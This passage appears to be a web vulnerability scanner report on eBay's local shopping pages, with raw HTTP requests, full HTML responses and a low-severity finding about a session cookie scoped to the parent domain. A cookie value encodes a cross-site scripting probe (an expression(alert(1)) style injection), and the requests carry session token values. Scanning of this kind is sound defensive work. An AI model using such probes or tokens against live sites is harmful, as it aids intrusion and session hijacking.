Set-Cookie: s=CgAD4ACBPBpOBYWM4OWQzZGUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjAA7gDKTwaTgWh0dHA6Ly9sb2NhbC5lYmF5LmNvbTo4MC9sb2NhbC9sb2NhbHNjaC5odG1sLV9ua3c9eHNzM2UyZTQlMjJzdHlsZSUzZCUyMnglM2FleHByZXNzaW9uJTI4YWxlcnQlMjgxJTI5JTI5JTIyNzdhNDljNWQ4MDgmX2xvY2F0aW9uPTc1MjE3Jl9mcG9zPTc1MjE3Jl90cmtzaWQ9cDU3OTEubTE/X25rdz0mX2Zwb3M9NzUyMTcmX2ZscHJhZD0yNS4wJl9jYXRpZD1LO83/; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OBYWM4OWQzZGUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjAAywABTwVJCTH4Zkn+; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 22247
Date: Thu, 05 Jan 2012 06:24:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - </title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;margin:10px 0 0} .srpi {width:411px} .srpi input{width:295px;} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325735572012" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325735572012;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("A/3IsZik*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div id="LeftNav" class="lnav">
<!-- <fontT><h1 class="locs">Local Shopping</h1></fontT> -->
<a href="/local" class="locs">
   <img src="/local/images.i?file=LocalShoppingRibbon.png" />
   </a>
<!-- <form action="/localsch.html" name="distanceForm" id="distanceForm" class="sForm">-->
<div name="distanceForm" id="distanceForm" class="sForm">
   
           <input class="zipcode" autocomplete="off" name="_location" id="_location" value=", 75217">
           <div id="autocomplete" class="autocomplete"></div>
       
    <input type="hidden" id="_fpos" name="_fpos" value="75217">
        <input name="zipSub" type="button" value="" class="disSub">
        <div class="clr"></div>
<!-- <div class="cnz">
   <div id="citystate" style="float:left">, 75217</div>
   <div class="pd" style="float:left"></div>
   <div style="clear:both"></div>
   
</div> -->
<input type="hidden" id="zip" value="75217">
<!--<input name="_fpos" id="_fpos" value="75217" maxlength="5"></span> <input type="submit" value="" class="disSub">-->
   <div class="horizontal_track">
   <div class="horizontal_slit">
       <div id="progress" class="slider_bar" style="width:121.8px">&nbsp;</div>
   </div>
   <div class="simg" id="slider" style="left:91px" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">
       <div id="display" class="disp" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">25 miles</div>
       <input type="hidden" value="25" name="_flprad" id="_flprad">
       </div>
   </div>
   </div>
<div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding : 5px 0 0 10px"><a style="font-size:13px;font-weight:bold;color:#002398;display:none" href="/local/localsch.html?_nkw=&amp;_fpos=75217&amp;_inclfltr=1" id="clr" name="clrfltr">Clear all refinements</a></div><div style="padding:5px 0 5px 10px;font-family:Arial;font-weight:bold;font-size:12px;color:#333333"><h4 style=" margin: 0 0 10px;">By Price :</h4><div id="pFil"><span style="padding-right:5px;">$</span><input type="text" id="_sp" name="_sp" size="3" value="" style="margin:0;"><span style="padding: 0 5px;">to $</span><input id="_ep" name="_ep" type="text" size="3" value="" style="margin:0 3px 0 0;"><input type="button" class="disSub disSubDis" name="bP" id="bP" value=""></div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div><div class="ifltr-W">
   <h4 class="ifltr-hdr">Include only</h4>
   
   <div class="ifltr-lst">
       <ul>
           <li>
               <input type="radio" name="inclFltr" checked=checked value="1">
               <span>Local Retailers</span>
           </li>
           <li>
               <input type="radio" name="inclFltr" value="0">
               <span>eBay Sellers</span>
           </li>            
       </ul>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div id="fs"></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding:5px 0 10px 20px"><a href="http://www.ebay.com/sch/i.html?_nkw=" target="blank" style="font-size:13px;font-weight:bold;color:#003dac;">View results on ebay.com</a></div></div><div class="cont"><div style="float:left"><div>

<div class="srpbx1">
       <form action="/local/localsch.html" method="get" onsubmit="return vjo.ebay.local.LocalLandingPage.onSubmit();">
           <div>
               <div style="float:right">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi srchbox">
                   <input type="text" id="txt" name="_nkw" placeholder="Search locally " value='' autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               
               
               
               
                   <input type="hidden" value="75217" name="_fpos">
               
               
               
                   <input type="hidden" value="" name="_odkw">
                   
                                                                                   
           </div>
       </form>
</div></div><div id="localResults" class="results"><div id="LocalProductResultSet" class="bgshd"><div><div style="padding:5px; background-color:#F5F5F5" tt="0"><div></div><div style="clear:both"></div><div style="padding:10px 0"><div class="smm-s smm-e"><div class="sm-imc smm-imc"><b class="g-hdn">error</b><div class="smm-cnt">Your search returned 0 results</div></div></div></div></div></div><div></div><div></div></div></div></div><div id="map-prev" class="map"></div><div class="clr"></div></div><div class="srpLoad" id="srploading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div><div class="clr"></div></div><div class="footer" style="width:755px;"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("abff72671340a0366104ec94ff5c4d36");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><div id="map-cont" class="map"><div id="map_canvas" style="height:100%"></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event){ setPos(25.0) });_d.add('body','load',function(event) { this.initPriceFilter(); },vjo.ebay.local.srp.pricefilter.PriceFilter);_d.add('body','load',function(event) { this.init("75217", "2"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-localsch,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac89d3de-->

2.21. http://local.ebay.com/server-info  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /server-info

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server-info HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOAYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MnyBDM; nonsession=CgADKACBYa0OAYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MAywABTwVJCDEWKjCW
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a407a
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: s=CgAD4ACBPBpOdYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2N/3kGY; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OdYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MAywABTwVJJTL96PuP; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:29 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 37039
Date: Thu, 05 Jan 2012 06:24:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div 